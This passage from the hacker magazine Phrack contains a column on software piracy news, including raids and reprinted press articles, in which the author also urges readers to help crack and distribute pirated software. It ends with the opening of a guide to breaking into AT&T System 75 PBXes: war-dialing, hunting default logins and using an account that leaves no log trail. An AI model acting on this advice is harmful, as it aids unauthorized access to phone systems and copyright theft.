  2191.     btoa                          Binary files will be mailed in btoa format.
  2192.     ls (or dir) PLACE             Short (long) directory listing.
  2193.     get FILE                      Get a file and have it mailed to you.
  2194.     quit                          Terminate script, ignore rest of mail message
  2195.                                   (use if you have a .signature or are a
  2196.                                    VMSMAIL user).
  2197.  
  2198.    Notes:
  2199.    -> You must give a "connect" command (default host is gatekeeper.dec.com,
  2200.       default user is anonymous, default password is your mail address).
  2201.    -> Binary files will not be compressed unless "compress" or "compact"
  2202.       command is given; use this if at all possible, it helps a lot.
  2203.    -> Binary files will always be formatted into printable ASCII with "btoa" or
  2204.       "uuencode" (default is "btoa").
  2205.    -> All retrieved files will be split into 60KB chunks and mailed.
  2206.    -> VMS/DOS/Mac versions of uudecode, atob, compress and compact are
  2207.       available, ask your LOCAL wizard about them.
  2208.    -> It will take ~1-1/2 day for a request to be processed.  Once the jobs has
  2209.       been accepted by the FTP daemon, you'll get a mail stating the fact that
  2210.       your job has been accepted and that the result will be mailed to you.
  2211. _______________________________________________________________________________
  2212.  
  2213.                                 ==Phrack Inc.==
  2214.  
  2215.                    Volume Four, Issue Forty-One, File 5 of 13
  2216.  
  2217.                                   Pirates Cove
  2218.  
  2219.                                    By Rambone
  2220.  
  2221.  
  2222. Welcome back to Pirates Cove.  News about software piracy, its effects, and the
  2223. efforts of the software companies to put and end to it are now at an all time
  2224. high.  Additionally, there is an added interest among the popular media towards
  2225. the other goings-on in the piracy underworld.  Additionally over the past few
  2226. months there have been several major crackdowns around the world.  Not all of
  2227. the news is terribly recent, but a lot of people probably didn't hear about it
  2228. at the time so read on and enjoy.
  2229.  
  2230. If you appreciate this column in Phrack, then also be sure to send a letter to
  2231. "phracksub@stormking.com" and let them know.  Thanks.
  2232. _______________________________________________________________________________
  2233.  
  2234.  More Than $100,000 In Illegal Software Seized
  2235.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2236. WASHINGTON -- (BUSINESS WIRE) -- Illegal software valued in excess of $100,000
  2237. was seized from an electronic bulletin board computer system (BBS)
  2238. headquartered in Baltimore, Maryland, marking the first U.S. case for the
  2239. Business Software Alliance (BSA) against a BBS for pirating software.
  2240.  
  2241. The BSA previously initiated an enforcement campaign against illegal bulletin
  2242. boards in Europe and is investigating illegal boards in Asia.  As part of the
  2243. U.S. seizure, more than $25,000 worth of hardware was confiscated in accordance
  2244. with the court order, and the BBS, known as the APL, is no longer in operation.
  2245.  
  2246. Investigations conducted over the past several months found that, through the
  2247. APL BBS, thousands of illegal copies have been made of various software
  2248. programs.  Plaintiffs in the case include six business software publishers:
  2249. ALDUS, Autodesk, LOTUS Development, MICROSOFT, NOVELL, and WordPerfect.  The
  2250. action against APL was for allegedly allowing BBS users to upload and download
  2251. copyrighted programs.
  2252.  
  2253. Nearly 500 software programs were available for copying through the APL BBS, an
  2254. infringement of software publishers' copyright.  In addition, BSA seized APL's
  2255. business records which detail members' time on the BBS and programs uploaded
  2256. and/or copied.  BSA is currently reviewing these records for possible
  2257. additional legal action against system users who may have illegally uploaded or
  2258. downloaded copyrighted programs.
  2259.  
  2260. "Electronic  bulletin boards create increasingly difficult problems in our
  2261. efforts to combat piracy," according to Robert Holleyman, president of the BSA.
  2262. "While bulletin boards are useful tools to enhance communication channels, they
  2263. also provide easy access for users to illegally copy software," Holleyman
  2264. explained.
  2265.  
  2266. Strict federal regulations prohibit the reproduction of copyrighted software.
  2267. Legislation passed this year by the U.S. Congress contains provisions to
  2268. increase the penalties against copyright infringers to up to five years
  2269. imprisonment and a $250,000 fine.
  2270.  
  2271. The APL investigation, conducted by Software Security International on behalf
  2272. of the BSA, concluded with a raid by Federal Marshals on October 1, 1992.  In
  2273. addition to the six business software publishers, the BSA action was taken on
  2274. behalf of Nintendo.
  2275.  
  2276. Bulletin boards have grown in popularity over the past several years, totaling
  2277. approximately 2000 in the United States alone.  Through a modem, bulletin board
  2278. users can easily communicate with other members.  The BSA has recently stepped
  2279. up its worldwide efforts to eradicate the illegal copying of software which
  2280. occurs on some boards.
  2281.  
  2282. The BSA is an organization devoted to combating software theft. Its worldwide
  2283. campaign encompasses education, public policy, and enforcement programs in more
  2284. than 30 countries.  The members of the BSA include:  ALDUS, APPLE COMPUTER,
  2285. Autodesk, LOTUS Development, MICROSOFT, NOVELL, and WordPerfect.
  2286.  
  2287. The BSA operates an Anti-piracy Hotline (800-688-2721) for callers seeking
  2288. information about software piracy or to report suspected incidents of software
  2289. theft.
  2290.  
  2291. CONTACT:  Diane Smiroldo, Business Software Alliance, (202)727-7060
  2292.  
  2293. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2294.  
  2295.  Only The Beginning
  2296.  ~~~~~~~~~~~~~~~~~~
  2297. The bust of APL BBS had made unprecedented impacts in the pirate world because
  2298. of the implications behind the actual arrest.  Business Software Alliance
  2299. (BSA), representing many major business software companies along with Nintendo,
  2300. joined forces to hit APL very hard.  They joined forces to permanently shut
  2301. down APL and are, for the first time, trying to pursue the users that had an
  2302. active role in the usage of the BBS.
  2303.  
  2304. Trying to figure out who had uploaded and downloaded files through this BBS and
  2305. taking legal recourse against them is a very strong action and has never been
  2306. done before.  One of the major problem I see with this is how do they know if
  2307. what the records show was the actual user or someone posing as another user?
  2308. Also, how could they prove that an actual program was downloaded by an actual
  2309. user and not by someone else using his account?  What if one user had logged on
  2310. one time, never called back, and someone else had hacked their account?  I'm
  2311. also sure a sysop has been known, on occasion, to "doctor" someone's account to
  2312. not allow them to download when they have been leeching.
  2313.  
  2314. The points I bring up are valid as far as I am concerned and unless the Secret
  2315. Service had logs and phone numbers of people actually logged on at the time, I
  2316. don't see how they have a case.  I'm sure they have a great case against the
  2317. sysop and will pursue the case to the highest degree of the law, but if they
  2318. attempt to arrest users, I foresee the taxpayers' money going straight down the
  2319. drain.
  2320. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2321.  
  2322.  BSA Hits Europe
  2323.  ~~~~~~~~~~~~~~~
  2324. The Business Software Alliance reached their arms out across the Atlantic and
  2325. landed in Germany.  Along with Interpol and the local police, they proceeded to
  2326. take down 80% of the boards in Berlin.  One of the contributing factors in
  2327. these busts was that the majority of the boards busted were also involved in
  2328. toll fraud.  Until recently, blue boxing was the predominate means of
  2329. communication with the United States and other countries in Europe. When most
  2330. of these sysops were arrested, they had been actively blue boxing on a regular
  2331. basis.  Unfortunately, many parts of Germany had already upgraded their phone
  2332. system, and it became very risky to use a blue box.  It didn't stop most people
  2333. and they soon became easy targets for Interpol.  The other means of LD usage
  2334. for Germans was AT&T calling cards which now are very common. The local police
  2335. along with the phone company gathered months of evidence before the city wide
  2336. sweep of arrests.
  2337.  
  2338. The busts made a bigger impact in Europe than anyone would have imagined.  Some
  2339. of the bigger boards in Europe have been taken down by the sysops and many will
  2340. never go back up.  Many sysops have been arrested and fined large amounts of
  2341. money that they will be paying off for a long time.  BSA, along with local
  2342. police and Interpol, has done enough damage in a few days that will change
  2343. European Boards for a long time.
  2344. _______________________________________________________________________________
  2345.  
  2346.  IBM:  Free Disks For The Taking
  2347.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2348. In a vain effort to increase sales, IBM decided to send out 21 high density
  2349. diskettes to anyone who called.  On these diskettes was a new beta copy of OS/2
  2350. Version 2.1.  They were hoping to take a cheap way out by sending a few out to
  2351. people who would install it and send in beta reports.  What they got was
  2352. thousands of people calling in when they heard the word who were promptly Fed
  2353. Ex'ed the disks overnight.  The beta was not the concern of most, just the
  2354. diskettes that were in the package.  The actual beta copy that was sent out was
  2355. bug ridden anyway and was not of use on most systems.
  2356.  
  2357. When IBM finally woke up and figured out what was going on, they had already
  2358. sent out thousands of copies.  Some even requested multiple copies.  IBM then
  2359. proceeded to charge for the shipment and disks, but it was way too late, and
  2360. they had gone over budget.  Way to go IBM, no wonder your stock has plummeted
  2361. to $55 a share.
  2362. _______________________________________________________________________________
  2363.  
  2364.  Users Strike Back At U.S. Robotics
  2365.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2366. Since 1987, U.S. Robotics (USR) has been a standard among sysops and many end
  2367. users.  With the loyal following also came terrible customer service and long
  2368. delays in shipments.  Their modems, being in as much demand as they are, soon
  2369. showed the results of shortcuts in the manufacture of certain parts in some of
  2370. the more popular modems.  The most infamous instance of this happening was the
  2371. Sportster model which was a V.32bis modem which could be bought at a much lower
  2372. price than that of the Dual Standard.  The catch was that they cut some corners
  2373. and used that same communication board for both the Sportster and the Dual
  2374. Standard.  They assumed they could save money by using the same board on both
  2375. modems.  Boy were they wrong.
  2376.  
  2377. All that was done to the Sportster was to disable the HST protocol that would
  2378. make it into a Dual.  With the proper init string, one could turn a Sportster,
  2379. ROM version 4.1, into a full Dual in the matter of seconds and have spent 1/3
  2380. of the price of a full Dual Standard.
  2381.  
  2382. This outraged USR when they found out.  They first denied that it could be
  2383. done.  When they found out that it had gotten too wide-spread and could not be
  2384. stopped, they then proceeded to tell the public it was a copyright infringement
  2385. to use the "bogus" init string and threatened to sue anyone who attempted to
  2386. use it.  Most people laughed at that idea and continued to use it while giving
  2387. "the bird" to USR.  Some vendors are now even trying to make a buck and sell
  2388. Sportsters at a higher price, and some are even selling them as Duals.
  2389.  
  2390. Obviously, they have now discontinued making the Sportsters the cheap way and
  2391. are now making two separate boards for both modems.  The versions with the ROM
  2392. 4.1 are still floating around, can be found almost anywhere, and will always
  2393. have the capabilities to be run as a full Dual.  Better watch out though.  The
  2394. USR police might come knocking on your door <g>.
  2395. _______________________________________________________________________________
  2396.  
  2397.  Warez Da Scene?
  2398.  ~~~~~~~~~~~~~~~
  2399. Over the last 6 months there have been several changing of hands in the major
  2400. pirate groups.  One person who supplies them has bounced to 3 groups in the
  2401. last four months.  One group fell apart because of a lack of support from the
  2402. major members, but is making a valiant comeback.  And yet another has almost
  2403. split into two like AT&T stock.  We'll have to see what comes of that.
  2404.  
  2405. While only about 15% or so actually doing anything for the scene, the other 85%
  2406. seem to complain and bitch.  Either the crack doesn't work or someone forgot to
  2407. put in the volume labels.  Jesus, how much effort does it take to say, "Hey,
  2408. thanks for putting this out, but...".  The time and effort it takes to acquire
  2409. the program, check to see if it needs to be cracked, package it, and have it
  2410. sent out to the boards is time- and money-consuming and gets very little
  2411. appreciation by the majority of the users around the world.
  2412.  
  2413. Why not see some users send in donations to the group for the appreciation it
  2414. takes to send the files out?  Why not see more users volunteer to help courier
  2415. the programs around?  Help crack them?  Make some cheats, or type of some docs?
  2416. Be a part of the solution instead of the problem.  It would create less
  2417. headaches and gain more respect from the members who take the time and effort
  2418. to make this all possible.
  2419. _______________________________________________________________________________
  2420.  
  2421.  Review Of The Month
  2422.  ~~~~~~~~~~~~~~~~~~~
  2423. I usually type up a review of the best program I have seen since the last
  2424. issue, but since I was so disappointed with this game, I have to say something
  2425. about it.
  2426.  
  2427.  
  2428.   ___________________________________________________________________________
  2429.  |                                                                           |
  2430.  |   RELEASE INFORMATION                                                     |
  2431.  |___________________________________________________________________________|
  2432.  |                                                                           |
  2433.  | Supplied by : ACTION MAN & MUNCHIE ...................................... |
  2434.  | Cracked by  : HARD CORE ................................................. |
  2435.  | Protection  : Easy Password ............................................. |
  2436.  | Date        : 16th December 1992 (Still 14 days left!) .................. |
  2437.  | Graphics    : ALL ....................................................... |
  2438.  | Sound       : ALL ....................................................... |
  2439.  | Game Size   : 5 1.44Mb disks , Installation from floppies ............... |
  2440.  |___________________________________________________________________________|
  2441.  
  2442.  
  2443. One of the most awaited games of the year showed up at my doorstep, just
  2444. itching to be installed:  F15-]I[.  I couldn't wait to get this installed on
  2445. the hard drive and didn't care how much space it took up.  I was informed
  2446. during installation that the intro would take up over 2 megs of hard drive
  2447. space, but I didn't care.  I wanted to see it all.  Once I booted it and saw
  2448. the intro, I thought the game would be the best I had seen.  Too bad the other
  2449. 8 megs turned out to be a waste of hard drive space.
  2450.  
  2451. I started out in fast mode, getting right up in the skies.  Too bad that's the
  2452. only thing on the screen that I could recognize.  Zooming down towards the
  2453. coast, I noticed that it looked damn close to the land and, in fact, it might
  2454. as well have been.  The ocean consist of powder blue dots and had almost the
  2455. same color consistency as the land.  Not finding anything in the air to shoot
  2456. at, I proceeded to shoot a missile at anything that I thought would blow up.
  2457. This turned out to be just about everything, including bridges.  Let a few
  2458. gunshots loose on one and see a large fireworks display like you dropped a
  2459. nuclear bomb on it.
  2460.  
  2461. Close to 3 hours later, I finally found a jet, got it into my sights and shot 3
  2462. missiles at it.   A large explosion, another one, and then he flew past me
  2463. without even a dent showing.  I shot my last 2 at it, same result.  Thus my
  2464. conclusion:  the Russians must have invincible planes.  Either that or F-15 ]I[
  2465. has some major bugs.  I'll take a wild guess and say, hmm, bugs.
  2466.  
  2467. This game is not worth the box it comes in and I would not suggest anyone,
  2468. outside of a blind person, from purchasing this.  I hate ratings but I'll give
  2469. it a 2/10.  The 2 is for modem play, which is not bad, but not good enough.
  2470. _______________________________________________________________________________
  2471.  
  2472.  Piracy's Illegal, But Not The Scourge It's Cracked Up To Be     August 9, 1992
  2473.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2474.  By T.R. Reid and Brit Hume (Chicago Tribune)(Page 7)
  2475.  
  2476. The software industry has embarked on one of its periodic public relations
  2477. campaigns to get people to believe it's being robbed blind by software pirates.
  2478. Even The New York Times took the claims seriously and ran a front-page story
  2479. illustrated by a picture of a cheerful computer hacker wearing a Hawaiian shirt
  2480. sitting in his basement surrounded by PCs and awash in piles of disks, many of
  2481. them containing bootleg programs.
  2482.  
  2483. With a straight face, the Times reported the industry's claim that in 1990, the
  2484. last year for which figures are available, programs worth $2.4 billion were
  2485. pirated, an amount equal to nearly half the industry's total sales of $5.7
  2486. billion.  In fact, the software industry has no way of knowing how much it lost
  2487. to illegal copying, but the $2.4 billion figure is almost certainly rot.
  2488. Here's why.
  2489.  
  2490. It is true that it's a snap to make an "illegal" copy of a computer program and
  2491. equally true that the practice is rampant.  You just put a disk in the drive,
  2492. issue the copy command, and the computer does the rest.
  2493.  
  2494. But there is simply no way the software industry can estimate accurately how
  2495. many illegal copies there are, and even if it could, it couldn't possibly
  2496. determine how many of them represent lost sales.  It does not follow that every
  2497. time somebody makes a bootleg copy, the industry loses a sale.  That would be
  2498. true only if the software pirate would have paid for the program had he or she
  2499. not been able to get it for free.
  2500.  
  2501. Indeed, some of those illegal copies undoubtedly lead to actual sales.  Once
  2502. users try a program, particularly a full-scale application such as a word
  2503. processor or database, and like it, they may decide they need the instruction
  2504. book and want to be able to phone for help in using the program.
  2505.  
  2506. The only way to get those things is to buy the software.  If that sounds
  2507. pie-in-the-sky, consider that an entire branch of the industry has developed
  2508. around just that process.  It's called shareware -- software that is offered
  2509. free to try.  If you like it, you are asked to buy it.  In return, you get a
  2510. bound manual and telephone support.
  2511.  
  2512. The word processor with which this column was written, PC-Write, is such a
  2513. program.  So is the telecommunications program by which it was filed, ProComm.
  2514. These programs were both developed by talented independent software developers
  2515. who took advantage of the unprecedented opportunity the personal computer
  2516. provided them.  All they needed was a PC, a desk, a text editor and a special
  2517. software tool called a "compiler."  A compiler translates computer code written
  2518. in a language such as Basic, C or Pascal into the binary code that the computer
  2519. can process.
  2520.  
  2521. Once they had written their programs, they included a set of instructions in a
  2522. text file and a message asking those who liked the software to pay a fee and
  2523. get the benefits of being a "registered" user.  They then passed out copies to
  2524. friends, uploaded them to computer bulletin boards and made them available to
  2525. software libraries.  Everyone was encouraged to use the software -- and to pass
  2526. it on.
  2527.  
  2528. The ease with which the programs can be copied was, far from a problem for
  2529. these developers, the very means of distribution.  It cost them nothing and
  2530. they stood to gain if people thought their program good enough to use.  And
  2531. gain they have.  Both PC-Write and ProComm have made a lot of money as
  2532. shareware, and advanced versions have now been released through commercial
  2533. channels.
  2534.  
  2535. The point here is not that it's okay to pirate software.  It's not, and it's
  2536. particularly dishonest to use a stolen program for commercial purposes.  The
  2537. practice of buying one copy for an entire office and having everybody copy it
  2538. and use the same manual is disgraceful.  Software may be expensive, but it's a
  2539. deductible business expense and worth the price.
  2540.  
  2541. At the same time, it's not such a bad thing to use an unauthorized copy as a
  2542. way of trying out a program before you buy it.  The shareware industry's
  2543. success has proved that can even help sales.
  2544. _______________________________________________________________________________
  2545.  
  2546.  No Hiding From The Software Police                            October 28, 1992
  2547.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2548.  By Elizabeth Weise (The Seattle Times)(Page B9)(Associated Press)
  2549.  
  2550. One call to the Piracy Hotline is all it takes for the Software Police to come
  2551. knocking at your computers.  Parametrix Inc. of Seattle found that out last
  2552. year when the Software Police, also known as the Software Publishers
  2553. Association, showed up with a search warrant and a U.S marshal to audit their
  2554. computers.  The search turned up dozens of copies of unauthorized software
  2555. programs and meant a penalty of $350,000 for Parametrix.
  2556.  
  2557. The SPA says too many companies "softlift" -- buying only one copy of a program
  2558. they need and making copies for as many computers as they have.
  2559.  
  2560. It seems so easy -- and it's just as easy to get caught.
  2561.  
  2562. "It only takes one phone call to the 800 number to get the ball rolling.
  2563. Anyone taking that chance is living on borrowed time," said Peter Beruk,
  2564. litigation manager for the Washington D.C.-based SPA.  "You can run, but you
  2565. can't hide."  And the stakes are getting higher.  A bill is before President
  2566. Bush that would elevate commercial software piracy from a misdemeanor to a
  2567. felony.  The law would impose prison terms of up to five years and fines of up
  2568. to $250,000 for anyone convicted for stealing at least 10 copies of a program,
  2569. or more than $2,500 worth of software.
  2570.  
  2571. Those in the computer industry say softlifting will be hard to prevent unless
  2572. programmers are better policed.  AutoDesk Retail Products in Kirkland has met
  2573. obstacles in educating its staff on the law.  AutoDesk makes computer-assisted
  2574. drawing programs.  "The problem is that you end up employing people who don't
  2575. want to follow convention," AutoDesk manager John Davison said.  "We hire
  2576. hackers.  To them it's not stealing, they just want to play with the programs.
  2577. "You got a computer, you got a hacker, you got a problem."  Bootlegging results
  2578. in an estimated loss of $2.4 million to U.S. software publishers each year,
  2579. Beruk said.  That's out of annual sales of between $6 billion and $7 billion.
  2580. "For every legal copy of a program sold, there's an unauthorized copy of it in
  2581. use on an everyday basis," Beruk said.  As SPA and its member companies see it,
  2582. that's theft, plain and simple.
  2583.  
  2584. SPA was founded in 1984.  One of its purposes: to enforce copyright
  2585. infringement law for software manufacturers.  Since then it has conducted 75
  2586. raids and filed about 300 lawsuits, Beruk said.  Several of the larger raids
  2587. have been in the Northwest.  The SPA settled a copyright lawsuit against
  2588. Olympia-based U.S. Intelco for $50,000 in May.  Last year, the University of
  2589. Oregon Continuation Center in Eugene, Oregon, agreed to pay $130,000 and host a
  2590. national conference on copyright law and software use as part of a negotiated
  2591. settlement with SPA.  The tip-off call often comes to SPA's toll-free Piracy
  2592. Hotline.  It's often disgruntled employees, or ex-employees, reporting that the
  2593. company is running illegal copies of software programs, Beruk said.
  2594.  
  2595. At Parametrix, an investigation backed up the initial report and SPA got a
  2596. search warrant, Beruk said.  President Wait Dalrymple said the company now does
  2597. a quarterly inventory of each computer.  The company brings in an independent
  2598. company once a year to check for unauthorized programs.
  2599.  
  2600. Softlifting, Dalrymple said, can be an easy tangle to get into.  "Our company
  2601. had had extremely rapid growth coupled with similar growth in the number of
  2602. computers we use," he said.  "We had no policy regarding the use of our
  2603. software and simply didn't control what was happening."
  2604.  
  2605. Making bootleg copies of software is copyright infringement, and it's as
  2606. illegal -- and as easy -- as copying a cassette tape or a video tape.  The
  2607. difference is in magnitude.  A cassette costs $8, a video maybe $25, while
  2608. computer programs can cost hundreds and even thousands of dollars.  Audio and
  2609. video tapes come with FBI warnings of arrest for illegal copying.  Software
  2610. comes with a notice of copyright penalties right on the box.  But despite such
  2611. threats, softlifting isn't taken seriously, said Julie Schaeffer, director of
  2612. the Washington Software Association.  "It's really in the same arena of
  2613. intellectual property," Schaeffer said.  "But people don't think about the
  2614. hours and hours of work that goes into writing a program."
  2615.  
  2616. The Boeing Co. in Seattle is one company that tries hard not to break the law.
  2617. It has a department of Software Accountability, which monitors compliance with
  2618. software licensing.
  2619.  
  2620. AutoDesk resorts to a physical inventory of the software manuals that go with a
  2621. given program.  If programmers don't have the manuals in their work cubicles,
  2622. they can be fined $50.
  2623.  
  2624. The SPA itself said the problem is more one of education than enforcement.
  2625. "Because copying software is so easy and because license agreements can be
  2626. confusing, many people don't realize they're breaking the law," the SPA said.
  2627.  
  2628. Feigning ignorance of the law doesn't help.  With Microsoft products, a user is
  2629. liable as soon as the seal on a package of software is broken.  "At that point
  2630. you've agreed to Microsoft's licensing agreement under copyright law,"
  2631. Microsoft spokeswoman Katy Erlich said.  "It says so right on the package."
  2632. _______________________________________________________________________________
  2633.  
  2634.  Teenage Pirates and the Junior Underworld                    December 11, 1992
  2635.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2636.  by Justin Keery (The Independent)(Page 31)
  2637.  
  2638.                   "By the end of the year, any schoolboy with
  2639.                     a computer who wants Sex will get it."
  2640.  
  2641. The first print-run of 100,000 copies of Madonna's Sex has sold out.  A further
  2642. 120,000 will be printed before Christmas, and bookshops have ordered every last
  2643. one.  But parents beware... around 5,000 school children have their own copy,
  2644. and the number is growing rapidly as floppy disks are circulated in
  2645. playgrounds.
  2646.  
  2647. Viewing the disk edition on a computer reveals television-quality images from
  2648. the book -- the text, it seems, is deemed superfluous.  In disk form the
  2649. pictures can be copied and traded for video games, credibility or hard cash in
  2650. a thriving underground marketplace.  By the end of the year, any schoolboy with
  2651. a computer who wants Sex will get it.  The unlucky will catch a sexually
  2652. transmitted disease in the process -- the Disaster Master virus, found on the
  2653. Independent's copy.
  2654.  
  2655. Sex is a special-interest area in the thriving junior underworld of software
  2656. trading.  Circulation of Madonna's pictures among minors with neither the
  2657. budget nor the facial hair to buy Sex gives Madonna's publishers little cause
  2658. to fear loss of sales.  Neither Secker & Warburg in London nor Time-Warner in
  2659. New York knew of the unofficial digital edition.  But the publishers of
  2660. computer video games have much to lose from playground transactions.
  2661.  
  2662. Sex is not doing a roaring trade, said one schoolboy trader.  Video games, with
  2663. price-tags of up to pounds 40, are what every child wants, but few can afford.
  2664. But who needs to buy, when your classmates will trade copies of the latest
  2665. titles for another game, a glimpse of Madonna or a humble pound coin?
  2666.  
  2667. Games disks are usually uncopyable.  Skilled programmers "crack" the
  2668. protection, as an intellectual challenge and a way of gaining respect in an
  2669. exclusive scene, add "training" options such as extra lives, and post this
  2670. version on a computer bulletin board -- a computer system attached to a
  2671. telephone line where people log in to trade their "wares".
  2672.  
  2673. Most bulletin boards (BBSs) are friendly places where computer freaks exchange
  2674. tips, messages and "public domain" programs, made available by their authors
  2675. free of charge.  But illegitimate operators, or SysOps, look down on "lame"
  2676. legal boards, and "nuke" any public domain material submitted to their systems.
  2677.  
  2678. The larger pirate boards are the headquarters of a cracking group -- often in a
  2679. 15-year-old's bedroom.  There are perhaps 100 in Britain.  Cracked games and
  2680. "demos" publicize phone numbers, and a warning is issued that copyright
  2681. software should not be posted --a disclaimer of questionable legality.  New
  2682. members are asked if they represent law enforcement agencies.  According to a
  2683. warning message on one board, at least one BBS in the United States is operated
  2684. by the FBI.
  2685.  
  2686. Your account at a board may not allow you to download until you upload wares of
  2687. sufficient quality.  Games are considered old after a week, so sexy images,
  2688. "demos" or lists of use to hackers are an alternative trading commodity.
  2689. Available this week, as well as Madonna, are: "lamer's guide to hacking PBXs",
  2690. "Tex" and "Grapevine" -- disk magazines for pirates; and demos -- displays of
  2691. graphical and sound programming prowess accompanied by bragging messages,
  2692. verbal assaults on rival factions and advertisements for BBSs.  According to a
  2693. former police officer, the recipes for LSD and high explosives have circulated
  2694. in the past.
  2695.  
  2696. The board's "download ratio" determines how many disks are traded for every
  2697. contribution -- usually two megabytes are returned for every megabyte
  2698. contributed.  "Leech accounts" (unlimited access with no quotas) are there for
  2699. those foolish enough to spend between pounds 1 and pounds 60 per month.  But
  2700. children can sign on using a pseudonym, upload a "fake" -- garbage data to
  2701. increase their credit -- then "leech" as much as possible before they get
  2702. "nuked" from the user list.
  2703.  
  2704. The "modem trader" is a nocturnal trawler of BBSs, downloading wares, then
  2705. uploading to other boards.  Current modem technology allows users to transfer
  2706. the contents of a disk in 10 minutes.  A "card supplier" can provide a stolen
  2707. US or European phone credit card number.  The scene knows no language barriers
  2708. or border checks, and international cross-fertilization adds diversity to the
  2709. software in circulation.
  2710.  
  2711. Through the unsociable insomniac trader, or the wealthier "lamer" with a paid-
  2712. up "leech account," games reach the playground.  The traders and leeches gain
  2713. extra pocket money by selling the disks for as little as pounds 1, and from
  2714. there the trade begins.
  2715.  
  2716. Some market-traders have realized the profit potential, obtaining cracked
  2717. software through leech accounts and selling the disks on stalls.  Sold at a
  2718. pocket-money price of pounds 1 per disk, many games reach schools.  The trading
  2719. of copyright software is illegal but the perpetrators stand little chance of
  2720. getting caught and are unlikely to be prosecuted.
  2721.  
  2722. The victims, software houses, suffer real damage.  Sales of Commodore Amiga
  2723. computers equal the dedicated games machines -- the Sega Megadrive or Nintendo,
  2724. yet sales of Amiga games (on disk and therefore pirate fodder) often reach only
  2725. one third of the volume of their copy-proof console cartridge counterparts.
  2726. Despite his preference for Amiga technology, Phil Thornton of System 3 Software
  2727. is "seriously reconsidering" future development of Amiga games. Myth, a two-
  2728. year project, sold pitiful amounts.  Mr. Thornton was called by a pirate the
  2729. day it was released -- the game was available on a bulletin board.  Because of
  2730. piracy, the sequel to the successful Putty will be mastered instead for the
  2731. Nintendo console.
  2732.  
  2733. This tactic may not help for long.  The cracked Amiga release of Putty carried
  2734. an advertisement (added by pirates) for a Nintendo cartridge "backup" device.
  2735. Transferred to disk, a "pirate-proof" console game can be traded like any
  2736. other.  Games for the Nintendo and Sega systems are available on most bulletin
  2737. boards.
  2738.  
  2739. Scotland Yard only takes an interest in bulletin boards bearing pornography,
  2740. though most also carry pirate software.  Funded by the software industry, the
  2741. Federation Against Software Theft has successfully prosecuted only one board,
  2742. with "more pending."
  2743.  
  2744. This Christmas parents will buy hundreds of thousands of video games.  Some
  2745. children will ask for modems; thus games will be on the bulletin boards by
  2746. Boxing Day, and the first day of term will see the heaviest trading of the
  2747. year.
  2748.  
  2749. AUTHOR'S NOTE:  I considered using a pseudonym for this article.  Two years
  2750.                 ago, a Newsweek reporter exposed the North American bulletin
  2751.                 board network.  His credit rating, social security and bank
  2752.                 files were altered in a campaign of intimidation which included
  2753.                 death threats.  Most of those responsible were 15-year-olds.
  2754. _______________________________________________________________________________
  2755.  
  2756.  
  2757.                                 ==Phrack Inc.==
  2758.  
  2759.                    Volume Four, Issue Forty-One, File 6 of 13
  2760.  
  2761.                    A Brief Guide to Definity G Series Systems
  2762.                                      a.k.a
  2763.                                  System 75 - 85
  2764.  
  2765.                             Written by Scott Simpson
  2766.  
  2767.  
  2768.           Greets to Jim Anderson, The Missing Link, Randy Hacker, Dark Druid,
  2769. Nickodemus, Mercury, Renegade, Infinity (enjoy the army!), Weirdo, TomCat,
  2770. GarbageHeap, Phrack Inc.
  2771.  
  2772.  
  2773. Basic History
  2774. ~~~~~~~~~~~~~
  2775. Definity model systems came into existent in the later part of the 1970s.  In
  2776. 1983, AT&T came out with a revised model called 75.  This system was built to
  2777. hold more incoming lines and did not have as many errors as the earlier version
  2778. did.  The 1983 version was replaced with a version re-written in 1986.  Today,
  2779. the systems are referred to as G models.  System 75 is now called G1 and 85 is
  2780. called G2.  A new model is currently available and is called the Definity G3I
  2781. which is Generic 3 with an Intel chip, and Definity G3R which is Generic 3 with
  2782. a Risk chip.  There are 3 different versions to each model.  Version one is the
  2783. most common and it is an XE Single Carrier Unit.  The other two systems are 2
  2784. carriers.  A system will usually cost somewhere around 50 to 80 thousand
  2785. dollars.  You MIGHT come across a smaller version and it is called "Merlin
  2786. Legend."  This system will hold about 50-100 lines.  System 75 & 85 will hold
  2787. around 1000 lines.  System 75/85 are used by companies to house all of their
  2788. incoming lines, as well as to send their incoming lines to destinations set up
  2789. by the owners, whether it be Audix or any other setup.  There are many uses for
  2790. the system besides VMBs and PBXes.  System 75/85 has three main functions that
  2791. hackers are interested in. They are the capabilities of VMB, bridging, and of
  2792. course PBX exchanges.
  2793.  
  2794.  
  2795. Discovering the System
  2796. ~~~~~~~~~~~~~~~~~~~~~~
  2797. When you find a System 75, you will make a 1200/NONE connection (if HST used),
  2798. as most setups have a built in 1200 baud modem.  Normally, the controller
  2799. number will not be in the same prefix as the business or the PBX and the line
  2800. is actually owned by AT&T.  Try CNAing a System 75 line and it will tell you
  2801. that it is owned by AT&T.  Once you find a carrier, you will need to be able to
  2802. display ANSI or some equivalent type of terminal graphics.  Most are set to
  2803. N81, but some may be E71.  My suggestion is to use ToneLoc which is produced by
  2804. Mucho Maas and Minor Threat.  As you know, this program will scan for carriers
  2805. as well as tones.  This program can be found on just about every ELEET H/P BBS.
  2806.  
  2807.  
  2808. Getting into the System
  2809. ~~~~~~~~~~~~~~~~~~~~~~~
  2810. Getting into the system is the easy part if you have the defaults.  You must
  2811. find them on your own and you will find out that a lot of people are not
  2812. willing to trade for them.  There is one default that will enable you to snoop
  2813. around and tell whether or not they have a PBX, provided that they have not
  2814. changed the password or restricted the account.  This one default is usually a
  2815. fully operational account without the privileges of altering any data but I
  2816. have come across a couple of systems where it wouldn't do anything.  Using this
  2817. default account is a good way to start if you can find it.  It is also good to
  2818. use any time you call and don't plan on changing anything.  All actions by this
  2819. account are not kept in the system history file.  Now on to the good stuff!!
  2820.  
  2821.  
  2822. Abusing System 75
  2823. ~~~~~~~~~~~~~~~~~
  2824. After logging into a 75, there are several commands available depending on the
  2825. default you are using.  This part will be for the basics.  I will explain more
  2826. later for the more advanced people.
